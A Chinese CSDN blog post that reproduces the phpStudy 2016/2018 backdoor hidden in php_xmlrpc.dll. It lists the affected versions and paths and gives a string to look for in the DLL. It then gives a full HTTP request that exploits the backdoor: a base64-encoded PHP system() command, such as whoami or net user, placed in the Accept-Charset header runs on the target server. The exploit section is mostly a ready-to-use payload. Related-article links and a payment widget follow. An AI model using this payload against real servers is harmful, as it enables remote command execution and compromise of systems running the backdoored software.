phpstudy后门复现

最新推荐文章于 2024-07-31 10:58:10 发布
最新推荐文章于 2024-07-31 10:58:10 发布
阅读量431 收藏 1
点赞数
分类专栏: Vuls
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackerie/article/details/102782579
版权

1.影响版本分布:

  • phpStudy2016
    php\php-5.2.17\ext\php_xmlrpc.dll
    php\php-5.4.45\ext\php_xmlrpc.dll
  • phpStudy2018
    PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
    PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

2.直观感性验证:

用记事本或者Notepad++打开phpstudy安装目录下的:

PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

存在@eval(%s('%s'));即说明有后门。

3.客观理性验证:

BP抓包复现  》》》 直接访问首页抓包

在请求头里构造 Accept-Encoding 和 Accept-Charset 

然后在请求头里添加 accept-charset: c3lzdGVtKCduZXQgdXNlcicpOw==
Accept-Charset 的值就是执行的命令,默认是system('net user');
如果想要执行其他命令,直接去把命令进行base64编码替换即可!

Post请求方式响应更直观:在请求头最后,制造若干空行。

Accept-Encoding:gzip,deflate

Accept-Charset:c3lzdGVtKCd3aG9hbWknKQ==

 

 

payload:

GET / HTTP/1.1
Host: 192.168.8.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept-Encoding: gzip,deflate
Accept-Charset: c3lzdGVtKCd3aG9hbWknKQ==
Content-Length: 6

参考:

https://dylan903.coding.me/2019/09/23/phpstudy-hou-men-lou-dong-fu-xian/

hackerie
关注
专栏目录
PhpStudy后门漏洞实战复现
la-大白
10-28 4888
phpstudy后门漏洞
phpstudy后门利用复现
Sys1em32 安全之路
09-26 838
0x01.简介 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用。 0x02.漏洞描述 phpstudy近期被爆存在有人恶意植入后门,相关大佬已经被请去喝茶了。 后门存在路径: phpStudy2016和phpStudy2018自带的php...
phpStudy后门漏洞复现
LuckySec
08-20 6042
0x01 漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连接木马之外,还可以正向执行任意php代码。 影响版本: phpStudy2016-php-5.2.17 phpStudy2016-php-5.4.45 phpStudy2018-php-5.2.17 phpStudy2018-php-5.4.45 更多漏洞细节
phpstudy_2016-2018_rce_backdoor漏洞复现
最新发布
weixin_46365325的博客
07-31 610
PHP study 软件是国内的一款免费的 PHP 调试环境的程序集成包,通过集成 Apache、PHP、Mysql、PhpMyAdmin 等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。攻击者可以利用该漏洞执行 PHP 命令,也可以称作 phpstudy 后门。模块中,至少有2个版本:phpStudy2016 和 phpstudy 2018自带的php-5.2.17、php-5.4.45。使用bp编码后进行上传,在网页查看是否上传成功,使用蚁剑进行连接。更改 bp 字体为楷体24pt。
phpStudy后门利用复现
qq_17754023的博客
12-01 532
1.phpstudy介绍 Phpstudy是国内的一款免费的PHP调试环境的程序集成包,其通过集成Apache、PHP、MySQL、phpMyAdmin不同版本软件于一身,一次性安装无需配置即可直接使用,具有PHP环境调试和PHP开发功能。 2.后门事件 2018年12月4日,西湖区公安分局网警大队接报案,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量敏感信息。通过专业技术溯源进行分析,查明了数据回传的信息种类、原理方法、存储位置,并聘请了第三
Phpstudy后门漏洞复现
qq_56426046的博客
09-10 2407
2019年9月20日,网上传出phpStudy软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连接木马之外,还可以正向执行任意php代码。
记一次phpstudy后门漏洞复现
Animation77的博客
10-30 1611
通过查阅资料,后门代码存在于\ext\php_xmlrpc.dll模块中 phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45 phpStudy2016路径 php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll phpStudy2018路径 PHPTutorial\php...
phpstudy后门漏洞复现
09-06
- *1* *2* *3* [phpstudy后门预警及漏洞复现](https://blog.csdn.net/weixin_43886632/article/details/101294081)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
phpstudy后门利用
weixin_42140534的博客
03-25 860
0x01 漏洞简介 phpstudy是一个对初学php的人们很有帮助的工具,他集成的环境可以给初学者带来很多便捷之处,但是某些版本存在后门,如果服务器使用存在后门phpstudy搭建,这样可以直接被人家getshell 0x02 影响版本 phpstudy 2016版php-5.4 phpstudy 2018版php-5.2.17 phpstudy 2018版php-5.4.45 0x03 ...
自查phpstudy后门以及漏洞复现
潜心学安全的小白
10-08 1884
phpstudy事件描述自查后门漏洞复现环境准备漏洞利用修复建议 事件描述 杭州公安在9月20日发布的杭州警方通报打击涉网违法犯罪暨“净网行动2019”专项行动战果中提到,2016年发布的phpstudy版本被不法分子恶意植入后门,犯罪嫌疑人在2019年初被公安机关抓获。其利用植入的后门非法控制计算机67万余台,非法获取账号密码类、聊天数据类、设备码类等数据10万余组。受影响的用户还是比较多的。 ...
PHPstudy复现
angel的博客
01-08 210
今天开始更新一篇网络安全技术文章,这个漏洞都出来几个月了,我也复现很久,现在重新回到了CSDN,就在这个博客上继续更新我的动态吧,之后的开源工具的分享会在github上发布出来,我会把地址放在我的博客中,大家有兴趣可以去看一看。。这个漏洞是很久之前复现的,希望对大家有所帮助,解决方案就是升级PHPstudy。 笔者:angelslvy 时间:2019-11-12 描述:由于最近遇到这类型的网站...
phpstudy后门检验+复现
weixin_44897902的博客
09-28 348
最近phpstudy被爆出有后门,当时我还毫不在意,觉得自己不可能…然后,打脸 看着自己的phpstudy2018,数据库突然出问题,才发现自己已经成为别人的肉鸡好多年。。。 快来看看你的phpstudy有没有这样的后门吧 准备工作:win10虚拟机,phpstudy20181102,bp抓包工具 找到PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll 记事...
python phpstudy_phpStudy后门分析及复现
weixin_39604092的博客
12-10 225
参考文章:https://blog.csdn.net/qq_38484285/article/details/101381883感谢大佬分享!!SSRF漏洞学习终于告一段落,很早就知道phpstudy爆出来有后门,爆出漏洞的过程好像还挺奇葩的,时间也不算很充裕,今天简单学习下。影响版本目前已知受影响的phpStudy版本phpstudy 2016版php-5.4phpstudy 2018版php-...
【漏洞复现】之PhpStudy后门”利用复现、修复及使用脚本快速复现(最全,转自https://www.cnblogs.com/yankaohaitaiwei/p/11604762.html)
qq_45290991的博客
10-07 1211
【漏洞复现】之PhpStudy后门”利用复现、修复及使用脚本快速复现 (本文仅为平时学习记录,若有错误请大佬指出,如果本文能帮到你那我也是很开心啦)   该复现参考网络中的文章,该漏洞复现仅仅是为了学习交流,严禁非法使用!!!    一、事件背景   北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后...
RCE漏洞:phpstudy漏洞复现
一个努力学习网安的小牛马
10-16 385
phpstudy中存在一种RCE漏洞(Remote Code|Command Execute)由于程序中预留了执行代码或者命令的接口,并且提供了给用户使用的界面,导致被黑客利用, 控制服务器。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值